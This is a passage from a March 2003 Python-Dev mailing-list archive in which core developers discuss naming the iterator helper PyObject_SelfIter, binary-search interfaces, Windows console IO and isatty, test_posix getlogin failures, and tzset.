> (1, 2) < 0 is a good thing, just like we all agree that forbidding
> 1 + "2" is a good thing.

I agree with you there!

-- Michael Chermside


From python@rcn.com  Mon Mar 17 14:02:02 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 09:02:02 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>

> Where was this agreed upon?  

Perhaps I overstepped.  It's been on my todo list for a 
couple of months and didn't seem to be even slightly
controversial.


> __iter__ returning self doesn't sound very generic to me, 
> so at the very least the name should be changed IMO.  

Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
suggest PyObject_GenericIter. 


> Also, adding a standard API for a helper function this
> trivial doesn't really make sense to me.

This identical code was duplicated in a dozen different
modules in the same context.  It comes up when writing
most iterators and needed to be factored out.


Raymond Hettinge


From python@rcn.com  Mon Mar 17 14:41:01 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 09:41:01 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
Message-ID: <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>

> > __iter__ returning self doesn't sound very generic to me, 
> > so at the very least the name should be changed IMO.  
> 
> Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> suggest PyObject_GenericIter. 

A couple of other thoughts.  While Thomas found the "getiter" part
of the name to be unintuitive, the type of the slot is named (getiterfunc)
and most of the replaced functions had names like dictiter_getiter, 
enum_getiter, iter_getiter, listiter_getiter, xreadlines_getiter ...
So, my first preference is the name in the subject line.


Raymond Hettinger


From mchermside@ingdirect.com  Mon Mar 17 14:59:33 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Mon, 17 Mar 2003 09:59:33 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF7A5@INGDEXCHSANC1.ingdirect.com>

[Glyph Lefkowitz]
> This smells like another unformed PEP I don't have the time to think
> about or implement :-(, but I would definitely like to see mutability
> guarantees worm their way into the language at some point, too.

Hmm... as far as I can tell, this would be a fairly trivial change.
All we'd need to do is make a slight modification (just adding one
method to each) to ints, strings, and tuples (and perhaps a couple of
others) and you'd have your guarantee!

Of-course-guaranteeing-that-everything-is-mutable-might-not-be-what-you-e=
xpected

-- Michael Chermside


From thomas@xs4all.net  Mon Mar 17 15:10:40 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 16:10:40 +0100
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer> <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>
Message-ID: <20030317151040.GQ2112@xs4all.nl>

On Mon, Mar 17, 2003 at 09:41:01AM -0500, Raymond Hettinger wrote:

> > Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> > or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> > suggest PyObject_GenericIter. 

> A couple of other thoughts.  While Thomas found the "getiter" part
> of the name to be unintuitive, the type of the slot is named (getiterfunc)
> and most of the replaced functions had names like dictiter_getiter, 
> enum_getiter, iter_getiter, listiter_getiter, xreadlines_getiter ...
> So, my first preference is the name in the subject line.

But my original point still stands. dictiter_getiter, enum_getiter,
iter_getiter are all fairly clear: they get the iter for an (existing)
dictiter/enum/iter object. PyObject_GenericGetIter does not return an
iterator for a generic object, it's a generic way to return an iterator
*for an iterator*. PyIter_GenericGetIter, PyObject_IterGetIter, etc are
all more descriptive.

I also agree with Guido on that this should not be a public API function
(and if it is, it should be documented <wink>.) Functions that aren't
part of the public API but can't be static should be prefixed with _Py.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From ark@research.att.com  Mon Mar 17 15:17:33 2003
From: ark@research.att.com (Andrew Koenig)
Date: 17 Mar 2003 10:17:33 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>
Message-ID: <yu99znnuxbsi.fsf@europa.research.att.com>

Tim> For example, probing a vanilla binary search tree needs to stop
Tim> when it hits a node with key equal to the thing searched for, or
Tim> move left or right when != obtains.

The binary-search routines in the C++ standard library mostly avoid
having to do != comparisons by defining their interfaces in the
following clever way:

        binary_search   returns a boolean that indicates whether the
                        value sought is in the sequence.  It does not
                        say where that value is.

        lower_bound     returns the first position ahead of which
                        the given value could be inserted without
                        disrupting the ordering of the sequence.

        upper_bound     returns the last position ahead of which
                        the given value could be inserted without
                        disrupting the ordering of the sequence.

        equal_range     returns (lower_bound, upper_bound) as a pair.

In Python terms:

        binary_search([3, 5, 7], 6)  would yield False
        binary_search([3, 5, 7], 7)  would yield True
        lower_bound([1, 3, 5, 7, 9, 11], 9)    would yield 4
        lower_bound([1, 3, 5, 7, 9, 11], 8)    would also yield 4
        upper_bound([1, 3, 5, 7, 9, 11], 9)    would yield 5
        equal_range([1, 1, 3, 3, 3, 5, 5, 5, 7], 3)
                                would yield (2, 5).

If you like, equal_range(seq, x) returns (l, h) such that all the
elements of seq[l:h] are equal to x.  If l == h, the subsequence is
the empty sequence between the two adjacent elements with values that
bracket x.

These definitions turn out to be useful in practice, and are also
easy to implement efficiently using only < comparisons.

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From guido@python.org  Mon Mar 17 15:22:00 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 10:22:00 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: "Your message of Mon, 17 Mar 2003 09:02:02 EST."
 <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
 <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>
 <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
Message-ID: <200303171522.h2HFM0R18130@pcp02138704pcs.reston01.va.comcast.net>

> > Where was this agreed upon?  
> 
> Perhaps I overstepped.  It's been on my todo list for a 
> couple of months and didn't seem to be even slightly
> controversial.
> 
> 
> > __iter__ returning self doesn't sound very generic to me, 
> > so at the very least the name should be changed IMO.  
> 
> Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> suggest PyObject_GenericIter. 

The "generic" functions aren't just slot fillers, they do a lot of
work that is typical for most types.

The self-iter, OTOH, doesn't do what most types' iterators need -- it
only does what most *iterators* need for their own iterator.  So a
name with 'Self' in it is  more appropriate.

I'd pick PyObject_SelfIter.

> > Also, adding a standard API for a helper function this
> > trivial doesn't really make sense to me.
> 
> This identical code was duplicated in a dozen different
> modules in the same context.  It comes up when writing
> most iterators and needed to be factored out.

"Need" is a strong word.  It's okay to add this little convenience,
but please give it a proper name.  Maybe some day we'll have a
true generic iterator helper too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Mon Mar 17 15:28:15 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 10:28:15 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer> <200303171522.h2HFM0R18130@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001501c2ec99$d50dd480$125ffea9@oemcomputer>

> The "generic" functions aren't just slot fillers, they do a lot of
> work that is typical for most types.

Learned something new today.


> I'd pick PyObject_SelfIter.

Good.  I'll put it in this evening.


Raymond Hettinger


From tim.one@comcast.net  Mon Mar 17 18:45:17 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 13:45:17 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEFIFCAA.tim.one@comcast.net>

[David LeBlanc]
> It looks as though IO in Python (2.2.1), regardless of platform or device,
> happens in Objects/fileobject.c and, in particular, writing occurs in
> file_write(...)?

For builtin file objects, at least there, and in file_writelines(), and it's
also possible to use f.fileno() and then use lower-level facilities (like
os.write()).

> A few questions I hope a lurking (timbot? ;) ) person can answer:
>
> 1. Is the above true, or does something different happen when using a
> Windows console/commandline?

Using one how?  If via a Python file object, yes, the above is true.

> 2. Is there any way to know if a console is being used (that a
> device is the console)?

>>> import sys
>>> sys.stdin.isatty()
True
>>> sys.stdout.isatty()
True
>>> whatever = open('whatever.txt', 'w')
>>> whatever.isatty()
False
>>>

> 3. What's the purpose of the PC/msvcrtmodule.c file?

It implements the Windows-specific msvcrt module:

    http://www.python.org/doc/current/lib/module-msvcrt.html

> Does it play any role in the regular pythonic IO scheme of things?

No, and mixing console-mode IO via that module with standard IO can be a
disaster.

> I'm interested in discovering if the Win32 API for screen reading/writing
> can be used so that character color attributes and cursor commands can be
> manipulated. It would be nice if those could be used transparently to a
> python application so that an application sending (for instance)
> ANSI color codes would succede and one that didn't wouldn't care. I
> realize this is sort of like curses - is there a Windows version of curses
> that plays well with Python and isn't GPL?

This really belongw on c.l.py, where it gets asked frequently enough.  I
haven't paid attention to the answers.  Fredrik's Console extension for
Windows should tickle your fancy:

    http://effbot.org/zone/console-index.htm


From martin@v.loewis.de  Mon Mar 17 18:47:23 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 17 Mar 2003 19:47:23 +0100
Subject: [Python-Dev] Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <m3isuhesp0.fsf@mira.informatik.hu-berlin.de>

"David LeBlanc" <whisper@oz.net> writes:

> It looks as though IO in Python (2.2.1), regardless of platform or device,
> happens in Objects/fileobject.c and, in particular, writing occurs in
> file_write(...)?
[...]
> 1. Is the above true, or does something different happen when using a
> Windows console/commandline?

If you ask "does writing occur in file_write, even on Windows", then
"yes".  If you ask "does all writing occur in file_write, even on
Windows", then "no". It also occurs in file_writelines, posix_write,
string_print, w_string, and many places that use fprintf (too many
to enumerate them here).

> 2. Is there any way to know if a console is being used (that a device is the
> console)?

posix.isatty comes close.

> 3. What's the purpose of the PC/msvcrtmodule.c file? 

It exposes the following functions

	{"heapmin",		msvcrt_heapmin, METH_VARARGS},
	{"locking",             msvcrt_locking, METH_VARARGS},
	{"setmode",		msvcrt_setmode, METH_VARARGS},
	{"open_osfhandle",	msvcrt_open_osfhandle, METH_VARARGS},
	{"get_osfhandle",	msvcrt_get_osfhandle, METH_VARARGS},
	{"kbhit",		msvcrt_kbhit, METH_VARARGS},
	{"getch",		msvcrt_getch, METH_VARARGS},
	{"getche",		msvcrt_getche, METH_VARARGS},
	{"putch",		msvcrt_putch, METH_VARARGS},
	{"ungetch",		msvcrt_ungetch, METH_VARARGS},

as well as a few symbolic constants.

> Does it play any role in the regular pythonic IO scheme of things?

No. None of these functions is normally called; getpass.py uses
msvcrt.

Regards,
Martin


From jim@interet.com  Mon Mar 17 19:05:11 2003
From: jim@interet.com (James C. Ahlstrom)
Date: Mon, 17 Mar 2003 14:05:11 -0500
Subject: [Python-Dev] Windows IO
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>
Message-ID: <3E761C67.1030606@interet.com>

David LeBlanc wrote:

 >1. Is the above true, or does something different happen when using a
 >Windows console/commandline?

AFAIK, all Python IO uses the fprintf() functions of Windows.  These
stream IO functions are Posix emulations, are not the native
Windows IO functions, and are second class citizens.  The native
Windows IO functions are CreateFile(), ReadFile(), WriteFile() etc.
The native Windows functions support additional functionality.

 >2. Is there any way to know if a console is being used (that a device 
 >is the onsole)?

All Windows programs must provide a window to operate.  But
to make porting character-mode programs easier, Windows provides
a "Console Window" feature.  This is a Windows window you can
create which contains the handy features needed to support
character WriteFile() and fprintf().

Usually there is no need to test if a console is in use.  A
Windows program created as a console program has that coded
into its header, and the console is created when it starts.  It
is possible to use CreateProcess() to create a process and its
console window, but again there is no need to test.

 >3. What's the purpose of the PC/msvcrtmodule.c file? Does it play any 
 >role
 >in the regular pythonic IO scheme of things?

This is a handy module, but plays no role in Python IO.

 >I'm interested in discovering if the Win32 API for screen >reading/writing
 >can be used so that character color attributes and cursor
 >commands can be manipulated.

A console window supports arrays of cells, and the cell contains
the character and the cell attribule.  That means you can control
color of each cell.  Both character input and mouse input are
supported.  There is a cursor.  The whole thing is a lot like a
terminal (if anyone out there remembers those).

Jim Ahlstrom


From barry@python.org  Mon Mar 17 19:39:43 2003
From: barry@python.org (Barry A. Warsaw)
Date: Mon, 17 Mar 2003 14:39:43 -0500
Subject: [Python-Dev] test_posix failures?
Message-ID: <15990.9343.255137.681030@yyz.zope.com>

test_posix fails for me in current CVS:

ERROR: testNoArgFunctions (__main__.PosixTester)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "Lib/test/test_posix.py", line 46, in testNoArgFunctions
    posix_func()
OSError: [Errno 2] No such file or directory

----------------------------------------------------------------------
Ran 18 tests in 0.038s

narrowed down to posix.getlogin().  FTR I'm on RH7.3.

Here's the fun part <wink>: this succeeds if running in an xterm, but
fails if running in a XEmacs 21.4.11 shell buffer.  I tried it with
Emacs 21.2 as well and it also fails there.  A little C program
calling getlogin() gives the same results.  It also fails in a XEmacs
compilation buffer.

So the os.isatty() test isn't enough.  This returns True in all three
shells but getlogin() still fails.  The weird thing is that I've never
seen failures here before and I do this type of testing all the time.

Does anybody else see this?  Maybe we should just remove getlogin()
from NO_ARG_FUNCTIONS?

-Barry


From thomas@xs4all.net  Mon Mar 17 19:57:53 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 20:57:53 +0100
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <15990.9343.255137.681030@yyz.zope.com>
References: <15990.9343.255137.681030@yyz.zope.com>
Message-ID: <20030317195753.GS2112@xs4all.nl>

On Mon, Mar 17, 2003 at 02:39:43PM -0500, Barry A. Warsaw wrote:

> test_posix fails for me in current CVS:

> narrowed down to posix.getlogin().  FTR I'm on RH7.3.

> Here's the fun part <wink>: this succeeds if running in an xterm, but
> fails if running in a XEmacs 21.4.11 shell buffer.  I tried it with
> Emacs 21.2 as well and it also fails there.  A little C program
> calling getlogin() gives the same results.  It also fails in a XEmacs
> compilation buffer.

> So the os.isatty() test isn't enough.  This returns True in all three
> shells but getlogin() still fails.  The weird thing is that I've never
> seen failures here before and I do this type of testing all the time.

Getlogin isn't guaranteed to work even when running in a terminal. Using the
excellent 'screen' tool, you can 'log out' your session (on a per-shell
basis.) Being 'logged in' just means there is an entry for your terminal in
/var/run/utmp (although the location of the 'utmp' file is
system-dependent.) Observe:

>>> os.getlogin()
'thomas'
^AL
This window is no longer logged in.
>>> os.getlogin()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
OSError: [Errno 2] No such file or directory
>>> 

Inbetween the two 'getlogin' calls, I hit '^A', 'L', and screen told me
"This window is no longer logged in." And look, ma, no login. Note that
there isn't really a portable way to write utmp (screen jumps through hoops,
and disables the ability if it can't figure out how to do it) and it might
need special privileges, so we can't just add a utmp entry to check against.

I'm guessing you updated your (X)Emacs, your libc or something else on your
platform that causes this problem for you, Barry. Perhaps the 'getlogin'
test needs a 'utmp' resource ? :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From whisper@oz.net  Mon Mar 17 20:01:38 2003
From: whisper@oz.net (David LeBlanc)
Date: Mon, 17 Mar 2003 12:01:38 -0800
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEFIFCAA.tim.one@comcast.net>
Message-ID: <GCEDKONBLEFPPADDJCOEKEAMIPAA.whisper@oz.net>

> > 2. Is there any way to know if a console is being used (that a
> > device is the console)?
>
> >>> import sys
> >>> sys.stdin.isatty()
> True
> >>> sys.stdout.isatty()
> True
> >>> whatever = open('whatever.txt', 'w')
> >>> whatever.isatty()
> False
> >>>
>

J:\>python
Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.stdout.isatty()
64
>>>

Have we discovered the mystery of life at last? "True" is 64? :)
NOTE: PythonDoc says "isatty" is Unix only.

> This really belongw on c.l.py, where it gets asked frequently enough.

Sorry, I thought a Python "guts" question would be ok here and likely to get
better informed answers than over on the (more or less) application side of
the house.

> I haven't paid attention to the answers.  Fredrik's Console extension for
> Windows should tickle your fancy:

I'll take a look at it. Meanwhile, someone has kindly sent me source for a
PDCurses binding for Python.

Thanks to everyone for their answers! I'd like to thank the Academy, the
Screen Actor's Guild and especially, Timbot, who helped make it all possible
:) ;)

Regards,

Dave LeBlanc
Seattle, WA USA


From barry@python.org  Mon Mar 17 20:06:32 2003
From: barry@python.org (Barry A. Warsaw)
Date: Mon, 17 Mar 2003 15:06:32 -0500
Subject: [Python-Dev] test_posix failures?
References: <15990.9343.255137.681030@yyz.zope.com>
 <20030317195753.GS2112@xs4all.nl>
Message-ID: <15990.10952.901572.773533@gargle.gargle.HOWL>

>>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:

    TW> I'm guessing you updated your (X)Emacs, your libc or something
    TW> else on your platform that causes this problem for you,
    TW> Barry.

Who knows? :)
    
    TW> Perhaps the 'getlogin' test needs a 'utmp' resource ? 
    TW> :-)

Maybe we should just ditch the test.  It's only there to make sure
that getlogin() takes no arguments.

-Barry


From neal@metaslash.com  Mon Mar 17 20:29:47 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 17 Mar 2003 15:29:47 -0500
Subject: [Python-Dev] test_posix failures?
In-Reply-To: <15990.10952.901572.773533@gargle.gargle.HOWL>
References: <15990.9343.255137.681030@yyz.zope.com>
 <20030317195753.GS2112@xs4all.nl>
 <15990.10952.901572.773533@gargle.gargle.HOWL>
Message-ID: <20030317202947.GD14067@epoch.metaslash.com>

On Mon, Mar 17, 2003 at 03:06:32PM -0500, Barry A. Warsaw wrote:
> 
> >>>>> "TW" == Thomas Wouters <thomas@xs4all.net> writes:
> 
>     TW> I'm guessing you updated your (X)Emacs, your libc or something
>     TW> else on your platform that causes this problem for you,
>     TW> Barry.
> 
> Who knows? :)
>     
>     TW> Perhaps the 'getlogin' test needs a 'utmp' resource ? 
>     TW> :-)
> 
> Maybe we should just ditch the test.  It's only there to make sure
> that getlogin() takes no arguments.

I think the test should be removed. I'm the one who added it, but
there have been too many problems with it to make it useful.
I will remove it later, unless someone beats me to it.

Neal


From tim.one@comcast.net  Mon Mar 17 20:38:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 15:38:40 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEKEAMIPAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>

[David LeBlanc]
> Have we discovered the mystery of life at last? "True" is 64? :)
> NOTE: PythonDoc says "isatty" is Unix only.

I don't know what PythonDoc means.  The docs for the file-object method
isatty (which my examples used) do not say it's Unix only:

    http://www.python.org/doc/current/lib/bltin-file-objects.html

If some other piece of doc contradicts that, please tell

    mailto:python-docs@python.org

or open an SF bug report?


From tim.one@comcast.net  Mon Mar 17 21:26:08 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 16:26:08 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <3E75B2A8.3030102@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEGMFCAA.tim.one@comcast.net>

[Stuart Bishop]
>> Yup. It sucks, but is the best there is. I can't even find proprietary
>> solutions for various Unix flavours. Maybe a post to Slashdot saying
>> Zope 3 will be Windows only due to limitations in POSIX would at least
>> get something for the free distros :-)

[M.-A. Lemburg]
> I wonder why we need a TZ-parser then ? If it's non-standard
> anyway, the module is probably better off outside the core as
> separate download from e.g. SF.

TZ parsing code hasn't been added to Python, just a wrapper around the
platform tzset() function (if any, and for now ignoring the flavor of tzset
supplied by Windows).  POSIX defines various forms TZ values can take.  Some
forms have portable meaning across POSIX systems, while others do not.


>>> I hope the community takes up the challenge of building a sane
>>> cross-platform time zone facility building on 2.3 datetime's tzinfo
>>> objects.

>> A cross-platform time zone facility isn't a problem - the data
>> we need is available and maintained as part of numerous free Unix
>> distributions. We could even steal C code to decode it if we are
>> particularly lazy.

> -1
>
> Why bloat the Python distribution with yet another locale
> implementation ?

Well, I didn't say anything about the std distribution.  Whether there or
elsewhere, Python didn't and doesn't have any portable (x-platform) way to
deal with time zones.  2.3's tzinfo objects are capable of carrying time
zone information in a sane x-platform way, but no concrete tzinfo objects
are supplied.


From whisper@oz.net  Mon Mar 17 21:53:55 2003
From: whisper@oz.net (David LeBlanc)
Date: Mon, 17 Mar 2003 13:53:55 -0800
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>
Message-ID: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>

> -----Original Message-----
> From: python-dev-admin@python.org [mailto:python-dev-admin@python.org]On
> Behalf Of Tim Peters
> Sent: Monday, March 17, 2003 12:39
> To: David LeBlanc
> Cc: Python-Dev@Python. Org
> Subject: RE: [Python-Dev] RE: Windows IO
>
>
> [David LeBlanc]
> > Have we discovered the mystery of life at last? "True" is 64? :)
> > NOTE: PythonDoc says "isatty" is Unix only.
>
> I don't know what PythonDoc means.  The docs for the file-object method
> isatty (which my examples used) do not say it's Unix only:
>
>     http://www.python.org/doc/current/lib/bltin-file-objects.html
>
> If some other piece of doc contradicts that, please tell
>
>     mailto:python-docs@python.org
>
> or open an SF bug report?
>

I don't have the capability to open an SF bug report.

"isatty" is not documented at all under the Global Modules "sys" entry for
Python 2.2.1 documentation (sorry, I thought "PythonDoc" was a recognized
name). The following doesn't work:
J:\>python
Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> stdout.isatty()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'stdout' is not defined
>>> isatty(stdout)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'isatty' is not defined
>>> isatty(__stdout__)
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
NameError: name 'isatty' is not defined
>>> import os
>>> os.stdout.isatty()
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'module' object has no attribute 'stdout'
>>>

Is isatty a built-in, a function of os only available on Unix, or a function
of sys available on all platforms? It appears to be a function in the sys
module and so the doc for it should go there?

Under the "os" entry it's:
"isatty(fd)
Return 1 if the file descriptor fd is open and connected to a tty(-like)
device, else 0. Availability: Unix. "

I don't see how to create a file() that is connected to stdout without
importing sys...? Is there a way? If there is not, than file.isatty() is
moot.

So, really, what is the meaning of "64" as the return from
sys.stdout.isatty()?

Dave LeBlanc
Seattle, WA USA


From fdrake@acm.org  Mon Mar 17 22:06:49 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 17 Mar 2003 17:06:49 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
References: <BIEJKCLHCIOIHAGOKOLHOEGHFCAA.tim.one@comcast.net>
 <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <15990.18169.95695.749468@grendel.zope.com>

David LeBlanc writes:
 > "isatty" is not documented at all under the Global Modules "sys" entry for
 > Python 2.2.1 documentation (sorry, I thought "PythonDoc" was a recognized
 > name). The following doesn't work:
...
 > Is isatty a built-in, a function of os only available on Unix, or a function
 > of sys available on all platforms? It appears to be a function in the sys
 > module and so the doc for it should go there?

isatty() is a method of a file object.  It's documented as part of the
file object; see section 2.2.8 of the library reference manual.

 > Under the "os" entry it's:
 > "isatty(fd)
 > Return 1 if the file descriptor fd is open and connected to a tty(-like)
 > device, else 0. Availability: Unix. "
 > 
 > I don't see how to create a file() that is connected to stdout without
 > importing sys...? Is there a way? If there is not, than file.isatty() is
 > moot.

Standard output is the file object sys.stdout.

 > So, really, what is the meaning of "64" as the return from
 > sys.stdout.isatty()?

It's a true value.  That's all.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From martin@v.loewis.de  Mon Mar 17 22:08:31 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Mon, 17 Mar 2003 23:08:31 +0100
Subject: [Python-Dev] Windows IO
In-Reply-To: <3E761C67.1030606@interet.com>
References: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net> <3E761C67.1030606@interet.com>
Message-ID: <3E76475F.9080508@v.loewis.de>

James C. Ahlstrom wrote:
> AFAIK, all Python IO uses the fprintf() functions of Windows.  These
> stream IO functions are Posix emulations, are not the native
> Windows IO functions, and are second class citizens.  The native
> Windows IO functions are CreateFile(), ReadFile(), WriteFile() etc.
> The native Windows functions support additional functionality.

This isn't really the case. fprintf is not (primarily) defined in
POSIX, but in standard C, and it is part of the standard C library
that comes with the C compiler. It is true that fprintf is not a system
call on Windows, but neither is it a system call on Unix (the system
call on Unix is write(2)).

Regards,
Martin


From martin@v.loewis.de  Mon Mar 17 22:12:07 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Mon, 17 Mar 2003 23:12:07 +0100
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
References: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <3E764837.4090400@v.loewis.de>

David LeBlanc wrote:
> Is isatty a built-in, a function of os only available on Unix, or a function
> of sys available on all platforms? It appears to be a function in the sys
> module and so the doc for it should go there?

*This* question definitely is off-topic for python-dev. Python-dev 
readers are supposed to study the Python source code to answer such a 
question.

> So, really, what is the meaning of "64" as the return from
> sys.stdout.isatty()?

Use the source, Luke.

Regards,
Martin


From tim.one@comcast.net  Mon Mar 17 22:09:54 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 17 Mar 2003 17:09:54 -0500
Subject: [Python-Dev] RE: Windows IO
In-Reply-To: <GCEDKONBLEFPPADDJCOEIEBNIPAA.whisper@oz.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEHDFCAA.tim.one@comcast.net>

[David LeBlanc]
> I don't have the capability to open an SF bug report.

It's not restricted -- anyone can open a bug report.  You need a web browser
and an internet connection, of course.

> "isatty" is not documented at all under the Global Modules "sys" entry for
> Python 2.2.1 documentation

No, but why would it be?  I gave you a link to the current docs before:

    http://www.python.org/doc/current/lib/bltin-file-objects.html

Go there and search down for isatty.  In 2.2.1, the link is this instead:

    http://www.python.org/doc/2.2.1/lib/bltin-file-objects.html

> (sorry, I thought "PythonDoc" was a recognized
> name). The following doesn't work:
> J:\>python
> Python 2.2.1 (#34, Jul 16 2002, 16:25:42) [MSC 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
> >>> stdout.isatty()
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'stdout' is not defined

I showed concrete examples in the last msg.  stdout lives in sys, as was
shown there:

>>> import sys
>>> sys.stdout.isatty()
True
>>>

That's in 2.3.  I don't have 2.2.1.  Here's under 2.0:

>>> import sys
>>> sys.stdout.isatty()
64
>>>

> >>> isatty(stdout)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'isatty' is not defined
> >>> isatty(__stdout__)
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> NameError: name 'isatty' is not defined
> >>> import os
> >>> os.stdout.isatty()
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
> AttributeError: 'module' object has no attribute 'stdout'
> >>>

Please read the docs -- there's no reason to expect any of those to work.

> Is isatty a built-in,

No.

> a function of os only available on Unix,

No, although os.isatty exists on some platforms.  fileobject.isatty() exists
on all platforms.

> or a function of sys available on all platforms?

It's not in sys on any platform.

> It appears to be a function in the sys module and so the doc for it should
> go there?

Nope, isatty() is never in sys.  It's primarily a *method* on file objects,
as all the examples I've given have used.  sys.stdin and sys.stdout are file
objects.

> Under the "os" entry it's:
> "isatty(fd)
> Return 1 if the file descriptor fd is open and connected to a tty(-like)
> device, else 0. Availability: Unix. "
>
> I don't see how to create a file() that is connected to stdout without
